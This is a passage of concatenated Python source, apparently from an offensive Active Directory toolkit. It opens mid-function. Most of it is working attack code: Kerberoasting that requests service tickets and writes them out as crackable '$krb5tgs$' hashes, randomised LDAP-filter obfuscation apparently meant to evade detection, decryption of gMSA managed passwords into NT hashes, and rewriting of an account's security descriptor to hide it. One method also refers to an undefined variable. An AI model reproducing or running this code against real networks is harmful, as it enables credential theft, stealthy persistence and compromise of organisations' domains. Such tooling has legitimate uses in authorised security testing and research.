                hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),
                hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
            return entry
        elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:
            entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (
                constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
                hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),
                hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())
            return entry
        elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
            entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (
                constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
                hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),
                hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())
            return entry
        elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:
            entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
                constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
                hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),
                hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
            return entry
        else:
            logging.error('Skipping %s/%s due to incompatible e-type %d' % (
                decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
                decodedTGS['ticket']['enc-part']['etype']))

    def run(self, entries):
        answers = []
        entries_out = []
        entry_out = {}

        logging.debug('Total of records returned %d' % len(entries))
        for entry in entries:
            mustCommit = False
            sAMAccountName =  ''
            dn = entry.get('dn')
            memberOf = ''
            SPNs = []
            pwdLastSet = ''
            userAccountControl = 0
            lastLogon = 'N/A'
            delegation = ''
            try:
                entry_out['attributes'] = {'distinguishedName': dn}
                for attribute,value in entry['attributes'].items():
                    if str(attribute) == 'sAMAccountName':
                        sAMAccountName = entry['attributes']['sAMAccountName'][0] if isinstance(entry['attributes']['sAMAccountName'], list) else entry['attributes']['sAMAccountName']
                        mustCommit = True
                    elif str(attribute) == 'memberOf':
                        memberOf = entry['attributes']['memberOf']
                    elif str(attribute) == 'servicePrincipalName':
                        SPNs = entry['attributes']['servicePrincipalName'] if isinstance(entry['attributes']['servicePrincipalName'], list) else [entry['attributes']['servicePrincipalName']]
                if mustCommit is True:
                    if int(userAccountControl) & UF_ACCOUNTDISABLE:
                        logging.debug('Bypassing disabled account %s ' % sAMAccountName)
                    else:
                        for spn in SPNs:
                            answers.append([spn, sAMAccountName, memberOf, delegation])
            except Exception as e:
                logging.error('Skipping item, cannot process due to error %s' % str(e))
                pass

        if len(answers)>0:
            if self.__requestTGS is True or self.__requestUser is not None:
                # Let's get unique user names and a SPN to request a TGS for
                users = dict( (vals[1], vals[0]) for vals in answers)

                TGT = None

                # Check for forced encryption
                enctype = self.__encryption

                if self.__TGT and not enctype:
                    TGT = self.__TGT
                else:
                    TGT = self.getTGT(enctype)

                # convert hex to binary
                kdcopt = self.__options
                if kdcopt == None:
                    kdcopt = "0x40810010"

                scale = 16
                kdcbin = bin(int(kdcopt, scale))[2:].zfill(32)

                # enable options based on binary (left to right)
                opt = list()
                kdc_opts = list()
                idx = -1
                for b in kdcbin:
                    idx += 1
                    if int(b) == 1:
                        opt.append(constants.KDCOptions(idx).value)
                        kdc_opts.append(constants.KDCOptions(idx).name)

                logging.debug("Using KDC Options (" + ','.join(kdc_opts) + ")")
                
                for user, SPN in users.items():
                    sAMAccountName = user
                    downLevelLogonName = self.__targetDomain + "\\" + sAMAccountName

                    try:
                        principalName = Principal()
                        principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value
                        principalName.components = [downLevelLogonName]

                        try:
                            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
                                                                                    self.__kdcHost,
                                                                                    TGT['KDC_REP'], TGT['cipher'],
                                                                                    TGT['sessionKey'], opt, enctype)
                        except:
                            logging.error(f"User {principalName} does not support AES encryption")
                            continue

                        sess_key = self.outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, self.__targetDomain + "/" + sAMAccountName)
                        entry_out['attributes'] = {'sAMAccountName': sAMAccountName,
                                               'servicePrincipalName': SPN,
                                               'Hash': sess_key
                                               }
                        entries_out.append(entry_out.copy())
                    except Exception as e:
                        logging.debug("Exception:", exc_info=True)
                        logging.error('Principal: %s - %s' % (downLevelLogonName, str(e)))
            return entries_out

        else:
            logging.error("No entries found!")

    def request_users_file_TGSs(self):

        self.request_multiple_TGSs(usernames)

    def request_multiple_TGSs(self, usernames):
        # Get a TGT for the current user
        TGT = self.getTGT()

        for username in usernames:
            try:
                principalName = Principal()
                principalName.type = constants.PrincipalNameType.NT_ENTERPRISE.value
                principalName.components = [username]

                tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
                                                                        self.__kdcHost,
                                                                        TGT['KDC_REP'], TGT['cipher'],
                                                                        TGT['sessionKey'])
                self.outputTGS(tgs, oldSessionKey, sessionKey, username, username)
            except Exception as e:
                logging.debug("Exception:", exc_info=True)
                logging.error('Principal: %s - %s' % (username, str(e)))



#!/usr/bin/env python3
import random

from ..utils.helpers import in_exception

def equality_to_approximation_obfuscation(parsed_structure):
	"""
	Convert equality matches to approximation matches following Go EqualityToApproxMatchFilterObf pattern.
	This is safer than complex range transformations.
	"""
	def transform_operators(structure):
		if not structure:
			return
		
		for i in range(len(structure)):
			if isinstance(structure[i], list):
				transform_operators(structure[i])
			elif (isinstance(structure[i], dict) and 
				  structure[i].get("type") == "ComparisonOperator" and
				  structure[i].get("content") == "=" and
				  i > 0 and i + 1 < len(structure)):
				
				attr_token = structure[i-1]
				if (isinstance(attr_token, dict) and 
					attr_token.get("type") == "Attribute" and
					not in_exception(attr_token.get("content", ""))):
					
					if random.choice([True, False]):
						structure[i]["content"] = "~="
	
	transform_operators(parsed_structure) 


#!/usr/bin/env python3

from ..core.constants import (
	SID_ATTRIBUTES, DN_ATTRIBUTES, BITWISE_ATTRIBUTES
)

def is_sid_attribute(attr):
	"""Check if attribute typically contains SID values"""
	return attr.lower() in SID_ATTRIBUTES

def is_dn_attribute(attr):
	"""Check if attribute typically contains DN values"""
	return attr.lower() in DN_ATTRIBUTES

def is_bitwise_attribute(attr):
	"""Check if attribute supports bitwise operations"""
	return attr.lower() in BITWISE_ATTRIBUTES

def is_oid(text):
	"""Check if text is an OID (contains dots and numeric components)"""
	if not text or '.' not in text:
		return False
	parts = text.strip().split('.')
	return len(parts) >= 2 and all(part.isdigit() for part in parts if part)

def randomly_prepend_zeros_oid(oid, max_zeros):
	"""Randomly prepend zeros to OID components"""
	import random
	parts = oid.strip().split('.')
	for i in range(len(parts)):
		if parts[i].isdigit() and random.choice([True, False]):
			num_zeros = random.randint(1, max_zeros)
			parts[i] = '0' * num_zeros + parts[i]
	return '.'.join(parts)

def randomly_hex_encode_dn_string(value, probability):
	"""Randomly hex encode characters in DN string"""
	import random
	if not value:
		return value
	
	result = []
	for char in value:
		if char not in [',', '=', ' '] and random.random() < probability:
			hex_encoded = f"\\{ord(char):02x}"
			result.append(hex_encoded)
		else:
			result.append(char)
	
	return ''.join(result) 


#!/usr/bin/env python3
from powerview.utils.accesscontrol import AccessControl
from powerview.utils.constants import MSDS_MANAGEDPASSWORD_BLOB
from Cryptodome.Hash import MD4
from impacket.ldap import ldaptypes
import logging
import binascii

class MSA:
	@staticmethod
	def decrypt(blob):
		blob = MSDS_MANAGEDPASSWORD_BLOB(blob)
		hash = MD4.new()
		hash.update(blob["CurrentPassword"][:-2])
		passwd = (
		    binascii.hexlify(hash.digest()).decode()
		)
		return passwd

	@staticmethod
	def read_acl(secDesc):
		return AccessControl.get_user_sid(secDesc)

	@staticmethod
	def create_msamembership(principal_sid: str):
		sd = AccessControl.create_empty_sd()
		acl = AccessControl.create_ace(principal_sid)
		sd['Dacl'].aces.append(acl)
		return sd.getData() 

	@staticmethod
	def set_hidden_secdesc(sec_desc: bytes, whitelisted_sids: list[str]):
		"""
		Change the ntSecurityDescriptor to only allow the principal to access the account
		"""
		sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sec_desc)
		new_dacl = []
		for ace in sd['Dacl'].aces:
			if ace['Ace']['Sid'].formatCanonical() in whitelisted_sids or ace['AceType'] == ldaptypes.ACCESS_DENIED_OBJECT_ACE.ACE_TYPE:
				new_dacl.append(ace)
		sd['Dacl'].aces = new_dacl
		return sd.getData()